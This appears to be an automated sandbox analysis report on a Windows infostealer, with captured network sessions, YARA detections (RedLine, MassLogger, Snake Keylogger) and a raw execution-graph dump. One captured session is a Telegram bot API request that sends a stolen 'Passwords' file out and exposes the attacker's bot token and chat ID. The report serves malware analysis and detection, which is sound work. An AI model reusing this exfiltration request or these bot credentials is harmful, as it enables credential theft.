Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 09:15:24.669775963 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 09:15:24.857296944 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 08:15:24 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 09:15:30.742084026 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 11, 2025 09:15:30.929501057 CET | 273 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 08:15:30 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.12 | 49712 | 104.21.16.1 | 443 | 6892 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 08:15:25 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-11 08:15:25 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 08:15:25 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1898114
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tQ1Df4UsPnLhfq%2BK14%2FuVOFITzSOTU3mcIR1hWzCWvbT393QaqYhlPAhe0BpAkkuuW5trNsfJ%2B3lZXau1E1Vny8KDZId9VytaN0OcS0jGgkX88XRuTfuD%2BWCwaJfSETRU4ZrFWJi"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 90037578dc6e1899-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1570&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1796923&cwnd=153&unsent_bytes=0&cid=5d3851e7e3e2ff8d&ts=193&x=0"
2025-01-11 08:15:25 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.12 | 49713 | 149.154.167.220 | 443 | 6892 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 08:15:31 UTC | 295 | OUT | POST /bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendDocument?chat_id=1695799026&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd31ee33dc5b19
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2025-01-11 08:15:31 UTC | 1090 | OUT | Data Ascii: --===============8dd31ee33dc5b19Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 08:15:31 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 08:15:31 GMT
Content-Type: application/json
Content-Length: 566
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 08:15:31 UTC | 566 | IN | Data Ascii: {"ok":true,"result":{"message_id":1929,"from":{"id":7817497413,"is_bot":true,"first_name":"NOVALOGGER","username":"NOVALOGGERXbot"},"chat":{"id":1695799026,"first_name":"Alex","last_name":"Victor","username":"Alexxanderr_1","type":"private"},"date":173658



Target ID: 0
Start time: 03:15:20
Start date: 11/01/2025
Path: C:\Users\user\Desktop\mnXS9meqtB.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\mnXS9meqtB.exe"
Imagebase: 0x300000
File size: 1'132'544 bytes
MD5 hash: AA367F8D203CD02F8A82A1A351BAF271
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2347142574.0000000003150000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 2
Start time: 03:15:21
Start date: 11/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\mnXS9meqtB.exe"
Imagebase: 0x990000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.4776143140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false


Execution Graph

Execution Coverage: 3.8%
Dynamic/Decrypted Code Coverage: 0.4%
Signature Coverage: 5.2%
Total number of Nodes: 2000
Total number of Limit Nodes: 65
94020->93951 94022 32e9de __fcloseall 94021->94022 94023 32e9e6 94022->94023 94028 32e9fe 94022->94028 94204 327bda 47 API calls __getptd_noexit 94023->94204 94025 32ea7b 94208 327bda 47 API calls __getptd_noexit 94025->94208 94026 32e9eb 94205 327c0e 47 API calls __getptd_noexit 94026->94205 94028->94025 94029 32ea28 94028->94029 94032 32a8ed ___lock_fhandle 49 API calls 94029->94032 94031 32ea80 94209 327c0e 47 API calls __getptd_noexit 94031->94209 94035 32ea2e 94032->94035 94034 32ea88 94210 326e10 8 API calls __controlfp_s 94034->94210 94037 32ea41 94035->94037 94038 32ea4c 94035->94038 94189 32ea9c 94037->94189 94206 327c0e 47 API calls __getptd_noexit 94038->94206 94040 32e9f3 __fcloseall 94040->93953 94042 32ea47 94207 32ea73 LeaveCriticalSection __unlock_fhandle 94042->94207 94044->93945 94045->93954 94047 32af6d __fcloseall 94046->94047 94048 32af75 94047->94048 94049 32af8d 94047->94049 94144 327bda 47 API calls __getptd_noexit 94048->94144 94051 32b022 94049->94051 94056 32afbf 94049->94056 94149 327bda 47 API calls __getptd_noexit 94051->94149 94052 32af7a 94145 327c0e 47 API calls __getptd_noexit 94052->94145 94055 32b027 94150 327c0e 47 API calls __getptd_noexit 94055->94150 94071 32a8ed 94056->94071 94059 32b02f 94151 326e10 8 API calls __controlfp_s 94059->94151 94060 32afc5 94062 32afeb 94060->94062 94063 32afd8 94060->94063 94146 327c0e 47 API calls __getptd_noexit 94062->94146 94080 32b043 94063->94080 94064 32af82 __fcloseall 94064->94009 94067 32afe4 94148 32b01a LeaveCriticalSection __unlock_fhandle 94067->94148 94068 32aff0 94147 327bda 47 API calls __getptd_noexit 94068->94147 94072 32a8f9 __fcloseall 94071->94072 94073 32a946 EnterCriticalSection 94072->94073 94074 327cf4 __lock 47 API calls 94072->94074 94075 32a96c __fcloseall 94073->94075 94076 32a91d 94074->94076 94075->94060 94077 32a93a 94076->94077 94078 32a928 InitializeCriticalSectionAndSpinCount 94076->94078 94152 32a970 LeaveCriticalSection _doexit 94077->94152 94078->94077 
94081 32b050 __ftell_nolock 94080->94081 94082 32b0ac 94081->94082 94083 32b08d 94081->94083 94113 32b082 94081->94113 94087 32b105 94082->94087 94088 32b0e9 94082->94088 94162 327bda 47 API calls __getptd_noexit 94083->94162 94086 32b092 94163 327c0e 47 API calls __getptd_noexit 94086->94163 94097 32b11c 94087->94097 94168 32f82f 49 API calls 3 library calls 94087->94168 94165 327bda 47 API calls __getptd_noexit 94088->94165 94089 32b86b 94089->94067 94092 32b099 94164 326e10 8 API calls __controlfp_s 94092->94164 94095 32b0ee 94166 327c0e 47 API calls __getptd_noexit 94095->94166 94153 333bf2 94097->94153 94098 32b12a 94100 32b44b 94098->94100 94169 327a0d 47 API calls 2 library calls 94098->94169 94102 32b463 94100->94102 94103 32b7b8 WriteFile 94100->94103 94101 32b0f5 94167 326e10 8 API calls __controlfp_s 94101->94167 94107 32b55a 94102->94107 94111 32b479 94102->94111 94105 32b7e1 GetLastError 94103->94105 94115 32b410 94103->94115 94105->94115 94118 32b663 94107->94118 94121 32b565 94107->94121 94108 32b150 GetConsoleMode 94108->94100 94110 32b189 94108->94110 94109 32b81b 94109->94113 94174 327c0e 47 API calls __getptd_noexit 94109->94174 94110->94100 94116 32b199 GetConsoleCP 94110->94116 94111->94109 94112 32b4e9 WriteFile 94111->94112 94112->94105 94117 32b526 94112->94117 94176 32a70c 94113->94176 94115->94109 94115->94113 94120 32b7f7 94115->94120 94116->94115 94137 32b1c2 94116->94137 94117->94111 94117->94115 94129 32b555 94117->94129 94118->94109 94122 32b6d8 WideCharToMultiByte 94118->94122 94119 32b843 94175 327bda 47 API calls __getptd_noexit 94119->94175 94124 32b812 94120->94124 94125 32b7fe 94120->94125 94121->94109 94126 32b5de WriteFile 94121->94126 94122->94105 94136 32b71f 94122->94136 94173 327bed 47 API calls 3 library calls 94124->94173 94171 327c0e 47 API calls __getptd_noexit 94125->94171 94126->94105 94128 32b62d 94126->94128 94128->94115 94128->94121 94128->94129 94129->94115 94131 32b727 WriteFile 94134 32b77a GetLastError 
94131->94134 94131->94136 94132 32b803 94172 327bda 47 API calls __getptd_noexit 94132->94172 94134->94136 94136->94115 94136->94118 94136->94129 94136->94131 94137->94115 94138 32b28f WideCharToMultiByte 94137->94138 94139 3340f7 59 API calls __chsize_nolock 94137->94139 94140 32b2f6 94137->94140 94170 321688 57 API calls __isleadbyte_l 94137->94170 94138->94115 94141 32b2ca WriteFile 94138->94141 94139->94137 94140->94105 94140->94115 94140->94137 94142 335884 WriteConsoleW CreateFileW __chsize_nolock 94140->94142 94143 32b321 WriteFile 94140->94143 94141->94105 94141->94140 94142->94140 94143->94105 94143->94140 94144->94052 94145->94064 94146->94068 94147->94067 94148->94064 94149->94055 94150->94059 94151->94064 94152->94073 94154 333c0a 94153->94154 94155 333bfd 94153->94155 94157 333c16 94154->94157 94184 327c0e 47 API calls __getptd_noexit 94154->94184 94183 327c0e 47 API calls __getptd_noexit 94155->94183 94157->94098 94159 333c02 94159->94098 94160 333c37 94185 326e10 8 API calls __controlfp_s 94160->94185 94162->94086 94163->94092 94164->94113 94165->94095 94166->94101 94167->94113 94168->94097 94169->94108 94170->94137 94171->94132 94172->94113 94173->94113 94174->94119 94175->94113 94177 32a716 IsProcessorFeaturePresent 94176->94177 94178 32a714 94176->94178 94180 3337b0 94177->94180 94178->94089 94186 33375f 5 API calls 2 library calls 94180->94186 94182 333893 94182->94089 94183->94159 94184->94160 94185->94159 94186->94182 94187->94018 94188->94020 94211 32aba4 94189->94211 94191 32eb00 94224 32ab1e 48 API calls 2 library calls 94191->94224 94193 32eaaa 94193->94191 94194 32eade 94193->94194 94196 32aba4 __lseeki64_nolock 47 API calls 94193->94196 94194->94191 94197 32aba4 __lseeki64_nolock 47 API calls 94194->94197 94195 32eb08 94198 32eb2a 94195->94198 94225 327bed 47 API calls 3 library calls 94195->94225 94199 32ead5 94196->94199 94200 32eaea CloseHandle 94197->94200 94198->94042 94203 32aba4 __lseeki64_nolock 47 API calls 94199->94203 
94200->94191 94201 32eaf6 GetLastError 94200->94201 94201->94191 94203->94194 94204->94026 94205->94040 94206->94042 94207->94040 94208->94031 94209->94034 94210->94040 94212 32abaf 94211->94212 94215 32abc4 94211->94215 94226 327bda 47 API calls __getptd_noexit 94212->94226 94214 32abb4 94227 327c0e 47 API calls __getptd_noexit 94214->94227 94218 32abe9 94215->94218 94228 327bda 47 API calls __getptd_noexit 94215->94228 94218->94193 94219 32abf3 94229 327c0e 47 API calls __getptd_noexit 94219->94229 94221 32abbc 94221->94193 94222 32abfb 94230 326e10 8 API calls __controlfp_s 94222->94230 94224->94195 94225->94198 94226->94214 94227->94221 94228->94219 94229->94222 94230->94221 94318 304214 94231->94318 94236 374f73 94239 304252 84 API calls 94236->94239 94237 3041d4 LoadLibraryExW 94328 304291 94237->94328 94241 374f7a 94239->94241 94243 304291 3 API calls 94241->94243 94245 374f82 94243->94245 94244 3041fb 94244->94245 94246 304207 94244->94246 94354 3044ed 94245->94354 94247 304252 84 API calls 94246->94247 94250 30420c 94247->94250 94250->93878 94250->93880 94252 374fa9 94362 304950 94252->94362 94771 321e46 94255->94771 94259 346918 _wcschr __ftell_nolock 94258->94259 94260 321dfc __wsplitpath 47 API calls 94259->94260 94263 34692e _wcscat _wcscpy 94259->94263 94261 34695d 94260->94261 94262 321dfc __wsplitpath 47 API calls 94261->94262 94262->94263 94263->93898 94265 34bfb1 __ftell_nolock 94264->94265 94266 31f4ea 48 API calls 94265->94266 94267 34c00e 94266->94267 94268 3047b7 48 API calls 94267->94268 94269 34c018 94268->94269 94270 34bdb4 GetSystemTimeAsFileTime 94269->94270 94271 34c023 94270->94271 94272 304517 83 API calls 94271->94272 94273 34c036 _wcscmp 94272->94273 94274 34c107 94273->94274 94275 34c05a 94273->94275 94276 34c56d 94 API calls 94274->94276 94814 34c56d 94275->94814 94292 34c0d3 _wcscat 94276->94292 94279 321dfc __wsplitpath 47 API calls 94285 34c088 _wcscat _wcscpy 94279->94285 94280 3044ed 64 API calls 94281 34c12c 94280->94281 
94283 3044ed 64 API calls 94281->94283 94282 34c110 94282->93904 94284 34c13c 94283->94284 94286 3044ed 64 API calls 94284->94286 94287 321dfc __wsplitpath 47 API calls 94285->94287 94288 34c157 94286->94288 94287->94292 94289 3044ed 64 API calls 94288->94289 94290 34c167 94289->94290 94291 3044ed 64 API calls 94290->94291 94293 34c182 94291->94293 94292->94280 94292->94282 94294 3044ed 64 API calls 94293->94294 94295 34c192 94294->94295 94296 3044ed 64 API calls 94295->94296 94297 34c1a2 94296->94297 94298 3044ed 64 API calls 94297->94298 94299 34c1b2 94298->94299 94797 34c71a GetTempPathW GetTempFileNameW 94299->94797 94301 34c1be 94302 323499 117 API calls 94301->94302 94304 34c1cf 94302->94304 94303 3235e4 __fcloseall 83 API calls 94305 34c294 94303->94305 94304->94282 94306 3044ed 64 API calls 94304->94306 94314 34c289 94304->94314 94798 322aae 94304->94798 94305->94282 94307 34c342 CopyFileW 94305->94307 94310 34c2b8 94305->94310 94306->94304 94308 34c358 94307->94308 94309 34c32d 94307->94309 94308->94282 94309->94282 94811 34c6d9 CreateFileW 94309->94811 94820 34b965 94310->94820 94314->94303 94315->93867 94316->93889 94317->93895 94367 304339 94318->94367 94321 30423c 94323 304244 FreeLibrary 94321->94323 94324 3041bb 94321->94324 94323->94324 94325 323499 94324->94325 94375 3234ae 94325->94375 94327 3041c8 94327->94236 94327->94237 94531 3042e4 94328->94531 94332 3042c1 FreeLibrary 94333 3041ec 94332->94333 94335 304380 94333->94335 94334 3042b8 94334->94332 94334->94333 94336 31f4ea 48 API calls 94335->94336 94337 304395 94336->94337 94338 3047b7 48 API calls 94337->94338 94339 3043a1 _memcpy_s 94338->94339 94340 3044d1 94339->94340 94341 304499 94339->94341 94345 3043dc 94339->94345 94550 34c750 93 API calls 94340->94550 94539 30406b CreateStreamOnHGlobal 94341->94539 94342 304950 57 API calls 94350 3043e5 94342->94350 94345->94342 94346 3044ed 64 API calls 94346->94350 94347 304479 94347->94244 94349 374ed7 94351 304517 83 API calls 94349->94351 
94350->94346 94350->94347 94350->94349 94545 304517 94350->94545 94352 374eeb 94351->94352 94353 3044ed 64 API calls 94352->94353 94353->94347 94355 374fc0 94354->94355 94356 3044ff 94354->94356 94568 32381e 94356->94568 94359 34bf5a 94748 34bdb4 94359->94748 94361 34bf70 94361->94252 94363 375002 94362->94363 94364 30495f 94362->94364 94753 323e65 94364->94753 94366 304967 94371 30434b 94367->94371 94370 304321 LoadLibraryA GetProcAddress 94370->94321 94372 30422f 94371->94372 94373 304354 LoadLibraryA 94371->94373 94372->94321 94372->94370 94373->94372 94374 304365 GetProcAddress 94373->94374 94374->94372 94377 3234ba __fcloseall 94375->94377 94376 3234cd 94423 327c0e 47 API calls __getptd_noexit 94376->94423 94377->94376 94379 3234fe 94377->94379 94394 32e4c8 94379->94394 94380 3234d2 94424 326e10 8 API calls __controlfp_s 94380->94424 94383 323503 94384 323519 94383->94384 94385 32350c 94383->94385 94387 323543 94384->94387 94388 323523 94384->94388 94425 327c0e 47 API calls __getptd_noexit 94385->94425 94408 32e5e0 94387->94408 94426 327c0e 47 API calls __getptd_noexit 94388->94426 94390 3234dd __fcloseall @_EH4_CallFilterFunc@8 94390->94327 94395 32e4d4 __fcloseall 94394->94395 94396 327cf4 __lock 47 API calls 94395->94396 94406 32e4e2 94396->94406 94397 32e559 94433 3269d0 47 API calls _W_store_winword 94397->94433 94398 32e552 94428 32e5d7 94398->94428 94401 32e560 94401->94398 94403 32e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94401->94403 94402 32e5cc __fcloseall 94402->94383 94403->94398 94404 327d7c __mtinitlocknum 47 API calls 94404->94406 94406->94397 94406->94398 94406->94404 94431 324e5b 48 API calls __lock 94406->94431 94432 324ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94406->94432 94416 32e600 __wopenfile 94408->94416 94409 32e61a 94438 327c0e 47 API calls __getptd_noexit 94409->94438 94411 32e7d5 94411->94409 94415 32e838 94411->94415 94412 32e61f 94439 326e10 8 API calls __controlfp_s 94412->94439 94414 32354e 
94427 323570 LeaveCriticalSection LeaveCriticalSection _fseek 94414->94427 94435 3363c9 94415->94435 94416->94409 94416->94411 94440 32185b 59 API calls 2 library calls 94416->94440 94419 32e7ce 94419->94411 94441 32185b 59 API calls 2 library calls 94419->94441 94421 32e7ed 94421->94411 94442 32185b 59 API calls 2 library calls 94421->94442 94423->94380 94424->94390 94425->94390 94426->94390 94427->94390 94434 327e58 LeaveCriticalSection 94428->94434 94430 32e5de 94430->94402 94431->94406 94432->94406 94433->94401 94434->94430 94443 335bb1 94435->94443 94437 3363e2 94437->94414 94438->94412 94439->94414 94440->94419 94441->94421 94442->94411 94444 335bbd __fcloseall 94443->94444 94445 335bcf 94444->94445 94448 335c06 94444->94448 94528 327c0e 47 API calls __getptd_noexit 94445->94528 94447 335bd4 94529 326e10 8 API calls __controlfp_s 94447->94529 94454 335c78 94448->94454 94451 335c23 94530 335c4c LeaveCriticalSection __unlock_fhandle 94451->94530 94453 335bde __fcloseall 94453->94437 94455 335c98 94454->94455 94456 32273b __wsopen_helper 47 API calls 94455->94456 94459 335cb4 94456->94459 94457 326e20 __invoke_watson 8 API calls 94458 3363c8 94457->94458 94461 335bb1 __wsopen_helper 104 API calls 94458->94461 94460 335cee 94459->94460 94472 335d11 94459->94472 94477 335deb 94459->94477 94462 327bda __set_osfhnd 47 API calls 94460->94462 94463 3363e2 94461->94463 94464 335cf3 94462->94464 94463->94451 94465 327c0e __controlfp_s 47 API calls 94464->94465 94466 335d00 94465->94466 94468 326e10 __controlfp_s 8 API calls 94466->94468 94467 335dcf 94469 327bda __set_osfhnd 47 API calls 94467->94469 94470 335d0a 94468->94470 94471 335dd4 94469->94471 94470->94451 94473 327c0e __controlfp_s 47 API calls 94471->94473 94472->94467 94474 335dad 94472->94474 94475 335de1 94473->94475 94478 32a979 __wsopen_helper 52 API calls 94474->94478 94476 326e10 __controlfp_s 8 API calls 94475->94476 94476->94477 94477->94457 94479 335e7b 94478->94479 94480 335ea6 94479->94480 94481 
335e85 94479->94481 94483 335b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94480->94483 94482 327bda __set_osfhnd 47 API calls 94481->94482 94484 335e8a 94482->94484 94494 335ec8 94483->94494 94485 327c0e __controlfp_s 47 API calls 94484->94485 94487 335e94 94485->94487 94486 335f46 GetFileType 94488 335f93 94486->94488 94489 335f51 GetLastError 94486->94489 94492 327c0e __controlfp_s 47 API calls 94487->94492 94498 32ac0b __set_osfhnd 48 API calls 94488->94498 94493 327bed __dosmaperr 47 API calls 94489->94493 94490 335f14 GetLastError 94491 327bed __dosmaperr 47 API calls 94490->94491 94495 335f39 94491->94495 94492->94470 94496 335f78 CloseHandle 94493->94496 94494->94486 94494->94490 94497 335b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94494->94497 94501 327c0e __controlfp_s 47 API calls 94495->94501 94496->94495 94499 335f86 94496->94499 94500 335f09 94497->94500 94505 335fb1 94498->94505 94502 327c0e __controlfp_s 47 API calls 94499->94502 94500->94486 94500->94490 94501->94477 94503 335f8b 94502->94503 94503->94495 94504 33616c 94504->94477 94507 33633f CloseHandle 94504->94507 94505->94504 94506 32f82f __lseeki64_nolock 49 API calls 94505->94506 94525 336032 94505->94525 94508 33601b 94506->94508 94509 335b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94507->94509 94511 327bda __set_osfhnd 47 API calls 94508->94511 94508->94525 94510 336366 94509->94510 94512 33639a 94510->94512 94513 33636e GetLastError 94510->94513 94511->94525 94512->94477 94514 327bed __dosmaperr 47 API calls 94513->94514 94516 33637a 94514->94516 94515 336064 94519 336f40 __chsize_nolock 81 API calls 94515->94519 94515->94525 94520 32ab1e __free_osfhnd 48 API calls 94516->94520 94517 32ee0e 59 API calls __wsopen_helper 94517->94525 94518 32ea9c __close_nolock 50 API calls 94518->94525 94519->94515 94520->94512 94521 32af61 __flswbuf 78 API calls 94521->94525 94522 3361e9 94524 32ea9c __close_nolock 50 API calls 94522->94524 94523 32f82f 
49 API calls __lseeki64_nolock 94523->94525 94526 3361f0 94524->94526 94525->94504 94525->94515 94525->94517 94525->94518 94525->94521 94525->94522 94525->94523 94527 327c0e __controlfp_s 47 API calls 94526->94527 94527->94477 94528->94447 94529->94453 94530->94453 94535 3042f6 94531->94535 94534 3042cc LoadLibraryA GetProcAddress 94534->94334 94536 3042aa 94535->94536 94537 3042ff LoadLibraryA 94535->94537 94536->94334 94536->94534 94537->94536 94538 304310 GetProcAddress 94537->94538 94538->94536 94540 304085 FindResourceExW 94539->94540 94542 3040a2 94539->94542 94541 374f16 LoadResource 94540->94541 94540->94542 94541->94542 94543 374f2b SizeofResource 94541->94543 94542->94345 94543->94542 94544 374f3f LockResource 94543->94544 94544->94542 94546 304526 94545->94546 94549 374fe0 94545->94549 94551 323a8d 94546->94551 94548 304534 94548->94350 94550->94345 94552 323a99 __fcloseall 94551->94552 94553 323aa7 94552->94553 94554 323acd 94552->94554 94564 327c0e 47 API calls __getptd_noexit 94553->94564 94557 324e1c __lock_file 48 API calls 94554->94557 94556 323aac 94565 326e10 8 API calls __controlfp_s 94556->94565 94559 323ad3 94557->94559 94566 3239fe 81 API calls 5 library calls 94559->94566 94561 323ae2 94567 323b04 LeaveCriticalSection LeaveCriticalSection _fseek 94561->94567 94563 323ab7 __fcloseall 94563->94548 94564->94556 94565->94563 94566->94561 94567->94563 94571 323839 94568->94571 94570 304510 94570->94359 94572 323845 __fcloseall 94571->94572 94573 323888 94572->94573 94574 323880 __fcloseall 94572->94574 94575 32385b _memset 94572->94575 94576 324e1c __lock_file 48 API calls 94573->94576 94574->94570 94598 327c0e 47 API calls __getptd_noexit 94575->94598 94578 32388e 94576->94578 94584 32365b 94578->94584 94580 323875 94599 326e10 8 API calls __controlfp_s 94580->94599 94587 323676 _memset 94584->94587 94591 323691 94584->94591 94585 323681 94692 327c0e 47 API calls __getptd_noexit 94585->94692 94587->94585 94589 3236cf 94587->94589 94587->94591 
94589->94591 94592 3237e0 _memset 94589->94592 94593 322933 __stbuf 47 API calls 94589->94593 94601 32ee0e 94589->94601 94672 32eb66 94589->94672 94694 32ec87 47 API calls 3 library calls 94589->94694 94600 3238c2 LeaveCriticalSection LeaveCriticalSection _fseek 94591->94600 94695 327c0e 47 API calls __getptd_noexit 94592->94695 94593->94589 94597 323686 94693 326e10 8 API calls __controlfp_s 94597->94693 94598->94580 94599->94574 94600->94574 94602 32ee46 94601->94602 94603 32ee2f 94601->94603 94605 32f57e 94602->94605 94609 32ee80 94602->94609 94696 327bda 47 API calls __getptd_noexit 94603->94696 94712 327bda 47 API calls __getptd_noexit 94605->94712 94606 32ee34 94697 327c0e 47 API calls __getptd_noexit 94606->94697 94611 32ee88 94609->94611 94618 32ee9f 94609->94618 94610 32f583 94713 327c0e 47 API calls __getptd_noexit 94610->94713 94698 327bda 47 API calls __getptd_noexit 94611->94698 94614 32ee94 